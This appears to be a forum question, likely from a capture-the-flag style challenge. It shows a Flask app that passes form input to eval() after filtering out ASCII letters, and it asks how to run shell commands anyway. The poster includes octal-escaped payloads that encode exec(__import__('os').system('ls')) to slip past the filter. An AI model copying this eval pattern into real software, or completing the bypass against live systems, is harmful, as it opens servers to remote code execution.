26 Feb
How to bypass ascii_letters and run the code in eval
I have the following code:
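    from string import ascii_letters
    from flask import Flask, request, render_template

    app = Flask(__name__)

    # Route path and function name are assumed; the post shows only the body.
    @app.route('/', methods=['GET', 'POST'])
    def index():
        if request.method == 'POST':
            exp = request.form['Expression']
            # Reject any input that contains an ASCII letter
            for i in exp:
                if i in ascii_letters:
                    return render_template('index.html',
                                           exp='',
                                           result="Only [0-9] and special characters")
            try:
                # User-controlled input is passed to eval()
                result = eval(exp)
            except Exception as e:
                result = 'Something went wrong'
            return render_template('index.html', exp=exp, result=result)
        else:
            return render_template('index.html', exp='', result='')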
What can I do to execute a shell command?
- I tried something like this:
"\145\170\145\143(__\151\155\160\157\162\164__('\157\163').\163\171\163\164\145\155('\154\163'))"
- Output:
exec(__import__('os').system('ls'))
- If I change the input data to something like this:
"\145\170\145\143("__\151\155\160\157\162\164__('\157\163').\163\171\163\164\145\155('\154\163')")
- Output:
Something went wrong